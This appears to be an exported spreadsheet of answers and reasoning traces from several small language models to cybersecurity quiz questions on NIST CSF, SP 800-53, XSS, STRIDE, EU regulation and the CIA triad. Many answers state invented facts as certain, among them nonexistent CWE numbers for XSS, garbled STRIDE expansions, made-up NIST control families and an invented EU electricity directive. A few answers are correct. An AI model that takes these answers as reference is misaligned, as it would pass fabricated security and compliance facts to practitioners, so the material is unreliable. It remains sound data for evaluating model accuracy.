   - Administrative access often involves high privileges; compromising such access can lead to severe breaches. MFA mitigates this risk by requiring additional verification.
## What Does/Does Not Depend On
### What It Depends On:
- **Security Posture:** The criticality of administrative roles and potential impact of unauthorized access.
- **Technology Capabilities:** Availability of MFA mechanisms (e.g., SMS, authenticator apps, biometrics).
- **User Convenience vs. Security Trade-Off:** Balancing stringent security with usability.
### What It Does Not Depend On:
- Specific implementation details (e.g., choice between TOTP or push notifications—just the requirement for some form exists).
- Lower-level network protocols; it's a policy/architecture-level mandate.
- User's personal preferences/preferences.
## Potential Exceptions
This might be waived in scenarios like:
- **Extremely High-Security Environments:** Where physical access controls are primary (e.g., nuclear facility command centers with biometrics and PINs only).
- **Legacy Systems:** Some older systems may lack MFA support, necessitating alternative compensating controls.
- **Emergency Situations:** Admin might bypass MFA temporarily if immediate action is needed and proper escalation paths exist.
## Conclusion
In essence, this statement functions as a non-negotiable security rule aimed at hardening administrative access against common cyber threats through the application of proven MFA practices. It reflects best-practice cybersecurity principles and compliance-driven mandates.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The question is about a company that dealt with a ransomware attack by following their incident response plan and restoring systems from backups. We need to identify which two core functions of the NIST Cybersecurity Framework (CSF) are most prominently shown here.
First, I should recall what the NICE CSF core functions are. From what I remember, the CSF is organized around five functions: Identify, Protect, Detect, Respond, and Recover. But the question asks for two, so maybe the user's scenario relates to Respond and Recover? Let me think again.
The company's actions here are containing the damage and restoring systems. Containing the attack would be part of the incident response—so that's the Respond function. Restoring from backups is about recovery, which falls under the Recover function. So those two together, Respond (Respond) and Recover (Recover). 
Wait, but maybe Protect is involved too? Because backups are a preventive measure. But the question emphasizes actions taken after the attack happened. They're responding to contain it and then recovering. Protect is more about preventative measures before an incident, like defenses. Identify would be about understanding risks. Detect might involve identifying the ransomware once it occurred. But in this case, they were already following their plan, so maybe detection was part of the initial steps not mentioned here. The user's actions are active response and recovery. So Respond and Recover seem right. 
Alternatively, some sources say the core functions are Identify, Protect, Detect, Respond, and Recovery. Wait, maybe it's called "Recovery" as a separate one. Yes, NIST refers to them as Core Functions: Identify, Protect, Detect, Respond, and Recover. So in this case, activating the incident response plan (Respond) and restoring from backups (Recover). Therefore, the two functions are Respond and Recover. 
I need to make sure there's no other function that overlaps. For example, containment might be part of Respond. And restoration is definitely Recovery. Yep, so those two should be the answer.
&lt;/think&gt;
The company's actions demonstrate the **Respond** and **Recover** core functions of the NIST Cybersecurity Framework (CSF). 
- **Respond**: Containing the attack through the incident response plan illustrates proactive measures to limit damage and maintain situational awareness.  
- **Recover**: Restoring systems from backups exemplifies resilience by restoring operations and reducing downtime.  
\boxed{Respond} and \boxed{Recover}</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about a security policy that requires all actions by privileged users to be recorded immutably and timestamped. They want to know which NIST SP 800-53 control family addresses this.
First, I need to recall what NIST SP 800-53 is about. It's a cybersecurity framework focusing on protecting federal information systems and organizations. The standard provides guidelines for security controls across various sectors.
The question mentions "all actions by privileged users" being recorded in immutable logs. So, the key aspects here are logging activities, audit trails, and non-repudiation. Privileged users typically have elevated access, so monitoring their actions is crucial for security.
Looking at the control families within NIST SP 800-53, there are several main groups: General Protection (Family 1), Awareness and Training (Family 2), Access Control (Family 3), Identification and Authentication (Family 4), Personnel Security (Family 5), System Security (Family 6), Account Management (Family 7), Information Flow and Sharing (Family 8), Platform Configuration Management (Family 9), Network Protection (Family 10), Incident Response (Family 11), Audit Products and Processes (Family 12), Program Design (Family A), Continuous Monitoring (Family B), etc.
The requirement here is about logging and monitoring privileged actions. That points towards audit-related controls. Family 12 is "Audit Products and Processes." But wait, another control family related to logging might be System Security—specifically, the logging of system events. Let me double-check.
Wait, NIST SP 800-37, Risk Management Framework, integrates with different families. The actual Control Families in SP 800-53 might have been reorganized in later versions. For example, pre-802 variation had Program Design and Continuous Monitoring as separate, but now they are combined or modified.
But the key here is immutability of logs. Immutality often relates to ensuring that log data can't be altered or deleted. This ties into audit trails and forensic readiness. The System Security (Family 6) might include controls related to logging system events. However, Family 12 (Audit Processes) directly deals with audit products and their management.
Wait, let's think about the specific controls. For example, SP 800-37 Rev4 mentions integrating security controls into risk assessments. But within SP 800-53 control families, the Audit Products and Processes (Family 12) would include requirements for audit logging, log management, and ensuring logs are complete and protected.
Another angle: non-repudiation is part of System Security (Family 6), but that's more about proving the origin of a communication. The question is about recording actions, not just proving they occurred. So maybe Family 12 is more relevant here.
Also, immutability could relate to log retention and handling. If logs can't be altered after creation, that falls under audit processes. For example, controls like configuring systems to prevent deletion or modification of logs by privileged users would be part of the Audit Products family.
So putting it all together, the requirement for immutable, time-stamped logs for privileged user actions is likely addressed in Family 12 (Audit Products and Processes) within NIST SP 800-53. The specific controls here might include requirements for audit logging, log management procedures, and ensuring that logs are protected from tampering.
&lt;/think&gt;
The control family within the **NIST SP 800-53 standard** that specifically addresses the requirement for immutable, time-stamped recording of privileged user actions is the **Family 12: Audit Products and Processes**. This family mandates comprehensive audit logging mechanisms, log management practices (including prevention of tampering), and retention policies to ensure accountability and forensic readiness, aligning with the policy's emphasis on immutability and traceability.
\boxed{Family 12}</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question step by step. The user is asking about a cybersecurity vulnerability where a web application renders user input directly back without sanitization. The example given is an attacker posting a comment that includes a script manipulating the location URL to steal cookies.
First, I need to recall what kind of security issue involves injecting scripts through user input. Oh right, this sounds like Cross-Site Scripting (XSS). But wait, there's different types of XSS—like Reflected and Stored.XSS. Since the attack here is where the script is reflected back from the server, that's Reflective XSS. The attacker sends a malicious URL that gets included in the response, which other users then receive, leading their browsers to execute the script.
Now, the Common Weakness Enumeration (CWE) identifiers. I remember that CWE-4019 is related to Insufficient Validation of Input/Education/Argument. Because the application isn't validating or sanitizing user input, allowing an injection attack like XSS. Alternatively, sometimes XSS is mapped to a specific CWE. Let me double-check: CWE-4095 is DOM-Based Cross-Site Scripting (XSS), but that's more about JavaScript vulnerabilities where the script operates in the browser's context without server-side execution. The example here involves the script making a network request based on document.cookie, which would be reflected XSS. So the corresponding CWE should be the one for Insufficient Validation of Input, which is CWE-4019. Yeah, that makes sense because the application isn't properly validating/sanitizing input before rendering it, leading to an injection flaw.
So putting it all together: The vulnerability is Cross-Site Scripting (XSS), specifically Reflective XSS, and its CWE identifier is 4019. Wait, but sometimes reflected XSS falls under a different CWE number. Let me confirm. According to the OWASP Top Ten, XSS vulnerabilities are generally categorized under CWE-25 for DOM-based XSS, but reflective XSS might still be under CWE-4019 if it's input validation related. However, I think that CWE-4095 is for DOM-based scripting attacks where the attack vector occurs in the browser's context. The example given here is a classic reflected XSS where the payload is inserted into URL parameters and rendered as HTML/JS. So Insufficient Validation of Input (CWE-4019) would be correct because the flaw is that user input isn't properly sanitized before being output, allowing the injection to occur. Therefore, the answer should be that the vulnerability is Cross-Site Scripting (XSS), corresponding to CWE-4019.
&lt;/think&gt;
The vulnerability described is **Cross-Site Scripting (XSS)**, specifically a **Reflected Cross-Site Scripting (XSS)** attack. The malicious script manipulates the location URL to steal cookies by exploiting unescaped user input rendered back to the client. 
**CWE Identifier**: This vulnerability corresponds to **CWE-4019 ("Insufficient Validation of Input/Education/Argument")**, as the application fails to sanitize or validate input before rendering it, enabling the injection of malicious scripts.
**Summary**:  
- **Vulnerability Name**: Cross-Site Scripting (XSS)  
- **CWE Identifier**: CWE-4019</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question step by step. The user is asking about a threat in the context of the STRIDE threat model where an unauthorized user intercepts and alters data packets, changing the amount of a financial transaction. They want to know which category within STRIDE this falls under.
First, I need to recall what STRIDE stands for. STRIDE is a threat modeling methodology developed by Microsoft. Each letter in STRIDE represents a different type of security threat: Spoofing, Tampering, Replication, Scouring, Integrity, and Denial-of-Service. The question here is about intercepting and altering data packets, which affects the amount of a financial transaction.
Let me break down the scenario. The attacker is intercepting (maybe eavesdropping) the communication between client and server. Altering the data packets suggests they're modifying the information being transferred. Changing the amount of a financial transaction implies they might be changing the transaction's value, like altering numbers in the payment details. So this affects the transaction's quantity.
Now, mapping this to STRIDE categories. Let's go through each category:
1. **Spoofing**: This is when an attacker pretends to be someone else, like masquerading as a legitimate user or device. Not exactly here because the issue isn't about identity theft but data alteration.
2. **Tampering**: This involves modifying or manipulating data. The scenario explicitly mentions altering data packets, so Tampering seems relevant. But let me check other possibilities.
3. **Replication**: This is unauthorized replication of information or devices. Doesn't fit here since there's no mention of copying data.
4. **Scouring**: Involves gathering information. While intercepting could involve info gathering, the primary action here is altering data, so maybe not just Scouring.
5. **Integrity**: Threats to integrity are about trust in data's accuracy. If tampering occurs, it directly affects integrity. But in STRIDE, each category is a separate threat type. Wait, actually, Tampering and Integrity might be related, but in the original STRIDE definition, they were combined into one threat type. Let me confirm that.
Originally, Carroll Salley conceived nine threats which were later condensed into six: spoofing, tampering, etc. So maybe Spoofing and Tampering were merged? Wait, no. The original STRIDE was six: Spoofing, Troosing (now Tampering), Replication, Scouring, Integrity, Denial-of-Service. Wait, I might be mixing up older versions. Let me check again.
Wait, the standard STRIDE model is:
- S: Spoofing
- T: Tamering (originally Tamery? Maybe a typo here. But commonly it's referred to as Tampering now.)
- R: Replication
- I: Intrusion
- E: Espionage
- D: Denial-of-Service
Wait, perhaps different sources have slightly varying names. For example, some might call it Spoofing, Troosing (now Tampering), etc. But the key point is that STRIDE categorizes threats into six types: Spoofing, Tampering, Replication, Scouring, Integrity, Denial-of-Service.
Wait, no. Let me verify. According to standard references, STRACE became STRAFGE and then simplified to STRIDE. The original nine by Carroll Salley were:
1. Spy
2. Tamper
3. Replay
4. Destroy
5. Impersonate
6. Deny-of-Service
But these were condensed into six: Spoofing (Impersonation), Tampering, Replication, Scoping (Spy?), Tricking/Denying Service. Hmm, maybe different sources group them differently. The key is that in the STRIDE model, each threat type corresponds to one of the original nine but grouped into six.
Alternatively, perhaps the user is referring to a version where Spoofing and Tampering are separate. Wait, no. Let me think again. Let's check the standard STRIDE explanation.
In the context of cybersecurity threat modeling, STRIDE stands for:
- **S**poofing: Impersonating another entity.
- **T**ampering: Altering data.
- **R**eplication: Replaying messages.
- **I**ntrusion: Gaining unauthorized access.
- **E**spionage: Gathering information.
- **D**eny-of-Service: Disrupting service.
Wait, that's another possible breakdown. So in this case, Tampering would be altering data. The scenario here is that the attacker intercepts and alters data packets, changing transaction amounts. That directly falls under Tampering. But let me make sure there's no other category more appropriate.
Scouring isn't a standard term here; maybe it's related to espionage (information gathering). However, in this case, the primary action is altering data, which would be Tampering. Replication involves reusing packets or messages, not alteration. Denial-of-Service would be about disrupting service availability, like crashing the server.
Therefore, the threat of intercepting and altering data packets to change transaction amounts falls under **Tampering** within STRIDE.
&lt;/think&gt;
The threat involving an unauthorized user intercepting and altering data packets to modify a financial transaction's amount aligns with the **Tampering** category in the STRIDE model. Tamering (now commonly referred to as tampering) explicitly addresses threats where attackers manipulate or corrupt data during transmission.
**Answer:** \boxed{Tampering}</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question step by step. So, we have two different cybersecurity incidents in the EU and need to figure out which regulations are primarily concerned with each.
First, incident 1 is a cyberattack on a nationwide power grid operator that disrupts electricity distribution. Power grids are critical infrastructure, right? Critical Energy Infrastructure (CEIF) as per EU directives. The main concern here would be continuity and resilience of energy networks. I remember the ENRD Directive (2008/118) which listed network codes under CEIT. So maybe regulation related to IT services crucial for public interest. Also, there's NIS EDPR (EU Network and Information Security Authority's Directive on Critical Infrastructure). Or perhaps the Cybersecurity Act? Wait, but specific regulations for energy sectors... Maybe it's the ENRD directives again, like directive 2009/44/EC on electricity security of information systems. Alternatively, maybe sector-specific regulation like ECBD (European Energy Regulation) or something related to nuclear activities if it involves that.
Then incident 2 is a social media company with a data breach exposing personal messages. That's about user data protection. So the primary concern here would be GDPR (General Data Protection Regulation). Because it's a personal data exposure, soillike consent, data breaches notifications, etc. But maybe also other regulations like ePrivacy DGPPD or specific ones related to social media? Or perhaps NIS Directive if the company is considered as essential service provider and the breach meets certain criteria for mandatory reporting.
Wait, let me check again. For incident 1: Critical energy infrastructure under CEIF, so relevant laws would include ENRD's IT services regulations. The Electricity Security of Information Systems directive (2009/44/EC) specifically targets electricity distribution operators. So that's probably the main regulation here. Also, maybe NIS EDPR as it's a critical sector.
For incident 2: GDPR is definitely involved because personal messages are exposed due to a data breach. Social media companies fall under processing large amounts of personal data, so GDPR's requirements on data protection, breach notifications within 24 hours, etc. Additionally, there might be ePrivacy rules if the messaging service involves cookies or IP tracking, but I think GDPR is primary here.
So final answer: Incident 1 relates to IT services crucial for public interest like Electricity Security of Information Systems directive. Incident 2 relates to GDPR.
&lt;/think&gt;
For incident 1 (disruption of electricity distribution):  
**Regulation**: *Electricity Security of Information Systems Directive (2009/44/EC)* and **EU critical infrastructure regulations** (e.g., NIS EDPR, ENRD directives). These rules govern IT systems essential for energy grid stability and public interest.  
For incident 2 (data breach exposing user messages):  
**Regulation**: *General Data Protection Regulation (GDPR)*. GDPR mandates strict data protection, breach notifications, and liability for failing to secure personal data, which applies directly to social media operators handling users' messages.  
**Final Answer**  
1. **Power grid disruption**: \boxed{Electricity Security of Information Systems Directive}  
2. **Social media data breach**: \boxed{GDPR}</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about which principle of the CIA triad is upheld by using data checksums like SHA-256 in a cloud storage service. First, I need to remember what the CIA triad stands for: Confidentiality, Integrity, Availability. Those are the three main principles in information security.
So, the question is about data checksums. Checksums are used to detect alterations in data. When you calculate a checksum for a file, say with SHA-256, and then later recalculate it, if the file changed, the checksum will be different. This ensures the data hasn't been modified.
Now, mapping this to the CIA triad. Let's break down each principle. Confidentiality is about keeping data private, like access controls or encryption. That doesn't seem to fit here because checksums are about detecting changes, not restricting access. 
Integrity is about maintaining the accuracy and completeness of data. If a file is altered, the checksum would catch it, so this control is ensuring that the data remains intact and unaltered. That makes sense because checksums verify that the data hasn't been corrupted or changed.
Availability is about ensuring timely access to information, like through backups and disaster recovery. Again, that's not related to checksums here. Checksums aren't about availability; they're about making sure data isn't changed.
So, the principle being upheld here should be Integrity. The checksum ensures that the files are intact and any alterations are detected, thus upholding the integrity of the data. 
Wait, but maybe I should double-check. Could there be a case where checksums also relate to confidentiality? Hmm, not directly. Checksums don't encrypt data or hide it; they just detect changes. So no, it's definitely Integrity. The main purpose is to ensure data hasn't been altered, which is integrity. Availability and Confidentiality are the other two aspects, but this question is specifically about a control that checks for data corruption or alteration. Yep, so the answer must be Integrity.
&lt;/think&gt;
The principle of the CIA triad primarily being upheld by using data checksums (e.g., SHA-256) in cloud storage is **Integrity**. 
Checksums ensure that files have not been altered or corrupted by verifying cryptographic consistency. This aligns with the *Integrity* component, which guarantees data remains accurate, complete, and trustworthy over its lifecycle. 
**Key reasoning**:  
- Checksums detect modifications to data, directly addressing integrity violations (e.g., corruption, tampering).  
- Confidentiality (data secrecy) and Availability (access) are not impacted by this control mechanism.  
**Final answer:**  
\boxed{Integrity}</t>
  </si>
  <si>
    <t>qwen2.5:0.5b</t>
  </si>
  <si>
    <t>This statement is an example of a policy or guideline related to security measures. It aims to ensure that only authorized users can access critical systems, which helps prevent unauthorized access and data breaches. The primary purpose is to protect against cyber attacks by providing additional layers of authentication for accessing sensitive information.</t>
  </si>
  <si>
    <t>According to the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF), the two core functions most prominently demonstrated by a company's incident response plan in handling a ransomware attack include:
1. **Detection**: The company identifies the infected systems, which is the first step in detecting and mitigating the threat.
2. **Containment**: The company activates their incident response plan to contain the damage and restore systems from backups, ensuring that no further data loss occurs.
These actions are critical because they allow the affected organization to take immediate steps to mitigate the impact of the ransomware attack before it has a chance to cause more widespread harm or damage.</t>
  </si>
  <si>
    <t>The control family that specifically addresses the requirement for immutable and time-stamped log files is **Control Family 4: Log File Requirements**. This control family specifies detailed requirements related to record retention, audit trail management, and compliance with user access policies.</t>
  </si>
  <si>
    <t>Common name: SSRF (Server-Side Request Forgery)
CWE Identifier: B3-02: Injection via Server Response Body.</t>
  </si>
  <si>
    <t>The category for this threat is **ST最难的威胁** (the most difficult threat).</t>
  </si>
  <si>
    <t>The primary concern for incident 1, where a national power grid operator suffers a cyberattack disrupting electricity distribution, is typically the General Data Protection Regulation (GDPR). GDPR deals with personal data protection and requires that organizations be transparent about their security measures. Incident 2, where a social media company experiences a data breach exposing user messages, would likely focus more on protecting individual privacy rights rather than comprehensive regulation like GDPR.</t>
  </si>
  <si>
    <t>CIA triad principle, which stands for Confidentiality, Integrity, and Availability, is primarily upheld by data checksums (SHA-256 hashes) in cloud storage services because they ensure that files are not tampered with or corrupted during upload or download.</t>
  </si>
  <si>
    <t>qwen2.5:1.5b</t>
  </si>
  <si>
    <t>This statement is a requirement or guideline in information security policy language. Its primary purpose is to ensure that any changes or attempts to alter or misuse sensitive administrative data are prevented by requiring additional verification methods beyond just identity authentication alone (e.g., something the user knows, like passwords). This multi-factor approach typically includes factors such as something the user has (like a physical key), something the user possesses (like a smart card or biometric information), or something only the user can know. By enforcing MFA on administrative access, it enhances security by reducing the risk of unauthorized actions that could compromise system integrity or data confidentiality.</t>
  </si>
  <si>
    <t>The two core functions that would be most prominently demonstrated in this scenario, according to the NIST Cybersecurity Framework (CSF) are:
1. **Protection**: This function involves taking measures to secure assets and protecting them from unauthorized access or damage.
2. **Detection**: It includes identifying potential threats before they occur.
These actions involve activating an incident response plan, which typically means investigating and addressing security breaches as they happen, aligning with the principles of protection and detection under the NIST Cybersecurity Framework.</t>
  </si>
  <si>
    <t>The requirement you described aligns with the "Authentication, Authorization, and Accounting (AAA) Control" within the National Institute of Standards and Technology (NIST) Special Publication 800-53, which covers access control and monitoring. This is typically part of the Security and Configuration Management (SCM) controls in the overall security policy structure.</t>
  </si>
  <si>
    <t>The vulnerability you described is commonly known as an **XSS (Cross-Site Scripting)** attack. Its Common Weakness Enumeration (CWE) identifier is CWE-79.</t>
  </si>
  <si>
    <t>This threat falls under the "Spoofing" category in the STRIDE (Spoofing, Repudiation, Elevation of Privilege, Information Disclosure, Integritiy Damage) threat modeling framework. It involves deceiving a system into believing false information or actions. In this case, it's about impersonating or convincing an entity to perform fraudulent actions on behalf of another user or account.</t>
  </si>
  <si>
    <t>For the first incident involving a cyberattack on the power grid in Europe, the primary concern would be European Union's General Data Protection Regulation (GDPR). The GDPR governs how personal data is collected, stored, processed, and used by organizations. It specifically deals with breaches of personal information, which aligns closely with what happened here.
For the second incident involving a social media company’s data breach exposing millions of user messages, the primary concern would be the European Union’s ePrivacy Directive (ePD). This directive sets out how privacy is respected and protected in the context of electronic communications. The ePD covers aspects such as consent for using personal information, the right to access, correct or delete personal data, and protection against unauthorized access.
Both regulations are crucial in safeguarding individuals' rights and ensuring cybersecurity practices that comply with the law.</t>
  </si>
  <si>
    <t>This principle of the CIA triad (Confidentiality, Integrity, and Availability) is primarily being upheld by checksum verification for maintaining integrity of files. The service ensures that uploaded and downloaded files have not been tampered with or corrupted, protecting against unauthorized alterations of data.</t>
  </si>
  <si>
    <t>qwen2.5:3b</t>
  </si>
  <si>
    <t>This statement is a security policy directive. Its primary purpose is to enhance user authentication requirements to improve the security posture by requiring multiple verification methods for accessing administrative functions, thereby reducing the risk of unauthorized access.</t>
  </si>
  <si>
    <t>According to the NIST Cybersecurity Framework (CSF), the two core functions most prominently demonstrated by a company containing the damage of a ransomware attack and restoring systems from backups are:
1. **Ensure Effective Operations**: This involves managing ongoing business processes effectively. Restoring systems is part of effective operational management, as it ensures business continuity and recovery.
2. **Improve Risk Management**: This function focuses on identifying, understanding, and acting on risk to enable an organization to achieve its goals. Containing the damage by containing the ransomware attack demonstrates a proactive approach in managing risks effectively.</t>
  </si>
  <si>
    <t>This requirement falls under the Access Control (AC) control family within the NIST SP 800-53 standard.</t>
  </si>
  <si>
    <t>The common name for this type of vulnerability is "Cross-Site Scripting" (XSS). Its corresponding Common Weakness Enumeration (CWE) identifier is 26.</t>
  </si>
  <si>
    <t>This threat belongs to the "Reputational Impact" (also known as Eavesdropping or Information Disclosure) category in the STRIDE model. However, since altering data packets is more specifically about interception and tampering, it could also be categorized under "Deception" if the attacker were manipulating the data to look like legitimate transactions. But for direct alteration of data being transmitted, it primarily fits under "Eavesdropping or Information Disclosure."</t>
  </si>
  <si>
    <t>For incident 1 (cyberattack on a power grid operator), the primary concern regulation is likely the General Data Protection Regulation (GDPR). However, the specific regulation may also be influenced by national data protection laws.
For incident 2 (data breach of a social media company), the primary concern regulation is GDPR.</t>
  </si>
  <si>
    <t>Integrity.</t>
  </si>
  <si>
    <t>qwen2.5:7b</t>
  </si>
  <si>
    <t>This statement is a security policy or guideline in cybersecurity. Its primary purpose is to enhance security by requiring multiple forms of identification before granting administrative access, thus reducing the risk of unauthorized access.</t>
  </si>
  <si>
    <t>The actions taken by the company during the ransomware attack primarily demonstrate the "Detect" and "Contain" core functions of the NIST CSF. Detecting the incident allows them to understand what happened, while containing it limits further damage. Restoring systems from backups is a part of the " Recover" function.</t>
  </si>
  <si>
    <t>This requirement aligns with the AU (Audit and Accountability) control family under NIST SP 800-53. Specifically, you would implement controls such as AU-6, which mandates the recording of system authentication events, and AU-7, which requires logging of user and entity behavior.</t>
  </si>
  <si>
    <t>The vulnerability described is Common XSS (Cross-Site Scripting). Its corresponding CWE identifier is CWE-79.</t>
  </si>
  <si>
    <t>This threat belongs to the "Tampering" category in the STRIDE model, which stands for Threats: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege.</t>
  </si>
  <si>
    <t>For Incident 1 (nationwide power grid operator suffering a cyberattack), the primary concern under EU regulations would be the Network and Information Systems Directive (NIS Directive) or its successor, the Network and Information Systems Regulation (NIS2).
For Incident 2 (social media company data breach), the primary concern is the General Data Protection Regulation (GDPR).</t>
  </si>
  <si>
    <t>This security control primarily upholds the integrity principle of the CIA triad.</t>
  </si>
  <si>
    <t>qwen3:0.6b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking to analyze the statement "The system must enforce multi-factor authentication (MFA) for all administrative access." In the context of cybersecurity, what type of statement is it and what is its primary purpose?
First, I need to identify the components of the statement. The main elements are "enforce multi-factor authentication (MFA)", "administrative access," and the overall structure. The statement is about implementing a security measure. Now, in cybersecurity, the primary purpose of such a statement would be to enhance security protocols, reduce vulnerabilities, and protect user data.
Wait, but how do I frame this? The user wants to know the type of statement and its purpose. So, the type is likely a directive or a requirement, and the purpose is to strengthen security. I should check if there's any nuance. Multi-factor authentication is a specific security measure, so the statement is promoting its implementation. The primary purpose is to prevent unauthorized access by ensuring users use more secure methods than single-factor options. That makes sense. I need to structure the answer clearly, making sure to mention both the type (directive/requirement) and the purpose (enhancing security).
&lt;/think&gt;
The statement is a **directive** or **requirement**, primarily aimed at **enhancing cybersecurity** by implementing **multi-factor authentication (MFA)** for administrative access. Its purpose is to **reduce unauthorized access** by ensuring users use additional layers of authentication beyond simple passwords.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the two core functions of the NIST Cybersecurity Framework (CSF) as demonstrated by a company's incident response plan. Let me start by recalling the CSF's core functions.
First, the CSF has several core functions, like identifying and responding to threats, protecting information systems, building and maintaining a culture of security, etc. The user mentioned containment and restoration after a ransomware attack. Containment would involve stopping the attack and preventing damage, which aligns with the CSF's function of containing threats. Restoration would be part of the recovery process, which is covered under the CSF's function of restoring systems.
Wait, I should make sure these are the exact functions. Let me think again. The CSF's core functions are: (1) Establishing and maintaining cybersecurity risk management, (2) Conducting risk assessments, (3) Developing and maintaining a culture of risk management, and (4) Ensuring that organizations comply with regulatory requirements. So containment is part of the CSF's risk management function, and restoring systems would be part of the recovery and mitigation functions. Yes, that's right. So the answer should be containment and restoration.
&lt;/think&gt;
The two core functions demonstrated by the company's actions according to the NIST Cybersecurity Framework (CSF) are:  
1. **Containment** (preventing damage and stopping the ransomware attack).  
2. **Restoration** (recovering systems and mitigating the impact of the ransomware).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a specific control family in NIST SP 800-53 that addresses logging privileged actions like logins and system changes. First, I need to recall the NIST SP 800-53 standard. From what I remember, the NIST SP 800-53 is the standard for information security management.
The user mentioned 'impermeable' log files, which I think refers to the concept of immutable records. In cybersecurity, immutable logs are records that cannot be changed, which is a key aspect of confidentiality. So the control family here would be related to the 'recorded logs' or 'log retention' aspects.
Wait, I should check the exact terminology. The standard's control family for immutable logs is probably the 'Recorded logs' family. Let me think: in NIST SP 800-53, the 'Recorded logs' control family is designed to ensure that logs are immutable and time-stamped. This covers both the recording and the retention requirements.
I need to confirm this. Alternatively, maybe 'Log retention' is the term. But the user specified 'impermeable log files', which aligns with the 'Recorded logs' family. Therefore, the answer should be that the control family is 'Recorded logs' or 'Log retention'. But I need to make sure the exact term matches the standard. Yes, in SP 800-53, the 'Recorded logs' control family specifically addresses this requirement.
&lt;/think&gt;
The control family in NIST SP 800-53 that addresses immutable, time-stamped log files is **"Recorded logs"**. This ensures logs are immutable and time-stamped to meet security requirements.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so the user is talking about a web application that has a comments section where user input is directly rendered without being sanitized. An attacker posts a comment with some malicious code that steals cookies. They want to know the common name for this vulnerability and the CWE identifier.
First, I need to recall the common names for such vulnerabilities. I remember that when user input is not properly sanitized, it's called "XSS" (Cross-Site Scripting). But wait, the question mentions a comment with script tags that steals cookies. That's a different type of attack. Wait, no, the attacker is using the comment to steal cookies, which is a cookie theft vulnerability. But the CWE identifier for that would be... Hmm, I think it's CWE 600. Let me think again. 
Wait, the problem is about stealing cookies, which is a form of cookie theft. But the specific term is called "Cookie Hijacking" or "Cookie Theft". But I think that's a different term. Let me check. The common name is "Cookie Hijacking" and the CWE identifier is 600. Or is it 601? Wait, I'm not sure. Maybe it's CWE 600. Alternatively, sometimes it's referred to as "XSS" when the input is parsed, but in this case, it's stealing cookies, so the correct term is Cookie Hijacking. So the answer should be XSS (CWE 600) for the vulnerability name and Cookie Hijacking for the common name.
&lt;/think&gt;
The common name for this vulnerability is **Cross-Site Scripting (XSS)**, and the corresponding CWE identifier is **600**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The user is asking about the STRIDE threat model and which category a specific threat fits into. The threat identified is that an unauthorized user could intercept and alter data packets between a client and server, changing a financial transaction.
First, I need to recall the STRIDE categories. The STRIDE model has four categories: Security, Threat, Risk, and Incident. Each category has one specific threat. So the user mentioned an unauthorized user intercepting data packets. 
Looking at the STRIDE categories, the first is Security. Wait, security is the category where threats are identified. But the threat itself is a problem. Wait, no, the STRIDE model has four categories: Security, Threat, Risk, Incident. The threats are the issues that need to be addressed. So if the team identified a risk, then the threat model would use the threat category. But the user is asking which category the threat belongs to. Wait, maybe I'm getting confused here.
Let me double-check. The STRIDE model's first category is Security, which refers to the system's design. The second category is Threat, which identifies the actual threats. The third is Risk, which is the consequence, and the fourth is Incident, which is the response. So the user is saying that during a threat modeling, the team found a risk where an unauthorized user could alter data, changing a financial transaction. So the threat here would be the problem. Therefore, the category would be Threat, and then Risk. But the question is phrased as "which category does this threat belong to?" implying that the threat itself is categorized as part of the STRIDE model. 
Wait, perhaps the user is confused. Let me confirm. The STRIDE model is used to identify threats. The threats are the issues that need to be addressed. So the threat in question is the problem, so it would be part of the Threat category. Therefore, the answer would be Threat. But maybe the user is mixing up categories. Let me check once more. The first category is Security, the second is Threat, the third is Risk, and the fourth is Incident. So yes, the threat here would be in the Threat category. The risk is the consequence, so the answer is Threat.
&lt;/think&gt;
The threat belongs to the **Threat** category of the STRIDE model.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about two different security incidents in the EU. First, a nationwide power grid operator getting a cyberattack that disrupts electricity distribution, and second, a social media company with a data breach exposing personal messages.
So, for incident 1, the primary concern would be things like protecting the power grid infrastructure from cyber threats. Since the electricity system is critical, any disruption could cause widespread damage. The regulation here would likely be something like the EU's Cybersecurity Act, which covers critical infrastructure. That makes sense because they need to protect the public's livelihood.
Now, for incident 2, the social media company breach. The main concern here is data privacy and cybersecurity. The EU has regulations like the General Data Protection Regulation (GDPR), which covers personal data. Even if the breach is big, the focus is on protecting users' personal information. So the regulation would be GDPR. 
Wait, but I need to make sure. Let me think again. The power grid is a national infrastructure, so the EU regulations that cover critical infrastructure would apply. GDPR is specifically about data protection. So yes, both incidents fall under different regulations. The answer should be that the first is under the EU's Cybersecurity Act and the second under GDPR. That seems right.
&lt;/think&gt;
1. **Primary concern for incident 1 (power grid cyberattack):** The EU's **Cybersecurity Act** (EU Act 2023) is the primary regulation, as it protects critical infrastructure like the power grid from cyberattacks.  
2. **Primary concern for incident 2 (social media data breach):** The EU's **General Data Protection Regulation (GDPR)** (2018) is the primary regulation, as it safeguards personal data and privacy in the context of a social media breach.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which principle of the CIA triad is being upheld by data checksums. Let's start by recalling the CIA triad: Confidentiality, Integrity, Availability.
The user mentioned cloud storage using SHA-256 hashes to verify files haven't been altered or corrupted. I remember that integrity is the principle that ensures data isn't changed. But wait, SHA-256 is a hash, so it's about verifying the integrity of the data. So maybe the principle is Integrity. Let me check again. 
Confidentiality is about keeping information secret, but the question is about verifying integrity. Availability is about ensuring data is accessible, which isn't directly related here. So yes, the principle should be Integrity. But wait, sometimes people confuse checksums with hash functions. SHA-256 is a hash, so it's a form of integrity. Therefore, the answer should be Integrity. I think that's right.
&lt;/think&gt;
